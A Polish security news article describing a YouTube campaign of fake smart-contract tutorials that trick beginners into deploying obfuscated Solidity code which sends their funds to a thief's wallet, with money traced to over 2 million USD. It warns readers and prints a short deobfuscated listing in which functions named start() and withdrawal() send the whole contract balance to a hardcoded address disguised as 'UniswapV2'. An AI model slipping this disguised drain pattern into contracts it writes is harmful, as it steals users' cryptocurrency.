Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book

Ciekawy sposób na wykradanie kryptowalut wykorzystujący poradniki dla programistów z YouTube

16 stycznia 2025, 11:14 | W biegu | 0 komentarzy

Autor znaleziska (posługujący się nickiem tim.sh) podzielił się swoimi spostrzeżeniami na temat szeroko zakrojonej kampanii fałszywych tutoriali na platformie YouTube (przykładowo: https[:]//youtu[.]be/Jig3Hb-y3yo). Autor “tutoriala” (dołączamy się do ostrzeżenia, aby pod żadnym pozorem nie postępować zgodnie z krokami przedstawionymi na wideo) nakłania ofiary do zasilenia swojego portfela, a następnie sugeruje przeklejenie stosunkowo długiego kodu (źródło: https[:]//sites.google[.]com/view/flash-c0de) do IDE – Remix Ethereum. Ostatnim krokiem ma być wypłacenie środków, które mają się pojawić w portfelu Metamask.

TLDR:

  • Pewien użytkownik zauważył, że pewne tutoriale na YT, skierowane do początkujących, którzy chcą zacząć swoją przygodę z programowaniem np. smart kontraktów, zawierają zobfuskowaną logikę kodu. 
  • Bliższe przyjrzenie się tym materiałom wykazało, że nie są to materiały edukacyjne, a scam wycelowany w osoby, które chcą się nauczyć tworzenia własnych flash tokenów. Zadaniem przedstawionego kodu była kradzież środków z portfeli użytkowników i przesłanie ich na określony adres.
  • Dalsza analiza wykazała, że takich filmów w sieci jest dużo więcej niż mogłoby się wydawać. 
  • Prześledzenie przepływu środków pozwoliło określić, że pojedyncze konto na które wpływają wykradzione środki zgromadziło równowartość 2 000 000 USD

Pod tutorialem znajdują się komentarze, które sugerują działanie przedstawionej metody. Oszuści sprawnie odpowiadają na pytania z wielu kont, aby uwiarygodnić przekręt.

Rysunek 1. Komentarze sugerujące, że przedstawiony tutorial działa

Analiza kodu pokazuje, że zawiera on dużo operacji, które nie mają znaczenia i jedynie zaciemniają faktyczne działanie kontraktu.

address UniswapV2 = 0x40d4AeC2145a1EeB[...]ea5BC337c386BB;

function start() public payable {
 payable((UniswapV2)).transfer(address(this).balance);
}
function withdrawal() public payable {
 payable((UniswapV2)).transfer(address(this).balance);
}

Listing 1. “Zdeobfuskowany” kod, którego zadaniem jest przesłanie całej wartości kontraktu na adres reprezentowany przez UniswapV2 (źródło: medium.com).

Wszystkie transakcje trafiają na zahardkodowany adres portfela złodzieja, co zostało wyśledzone przy pomocy projektu Metasleuth.

Rysunek 2. Mapa powiązań transakcji – wszystkie środki trafiają do różowego portfela po środku  (źródło: medium.com)

Następnie środki przelewane są na kolejny adres, który przechowuje ponad 2 miliony USD.

Rysunek 3. Kolejny podejrzany portfel (źródło: medium.com)

Środki następnie trafiają na portfele giełdy ByBit oraz kasyno online stake[.]com, co może sugerować operację prania pieniędzy przez zakłady. 

Niestety osoby rozpoczynające swoją przygodę np. z programowaniem i kryptowalutami mogą mieć problemy w rozpoznaniu zagrożenia. Chociaż sam fakt pozyskiwania dużej ilości środków może sugerować, że przedstawione działania nie są prawdziwym tutorialem, to jednak informacje przedstawiane są w bardzo kuszący i przystępny sposób, co może skłonić wielu do eksperymentów. Na ten moment filmy prezentujące ten i podobne scamy są wciąż dostępne na platformie YT. 

Zachęcamy do skorzystania z „pełnoprawnych” i legalnych źródeł nauki, jak np. projekt Sekurak.Academy dla początkujących osób z zakresu cyberbezpieczeństwa.

~callsign.chaos && evilcat

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

Odpowiedz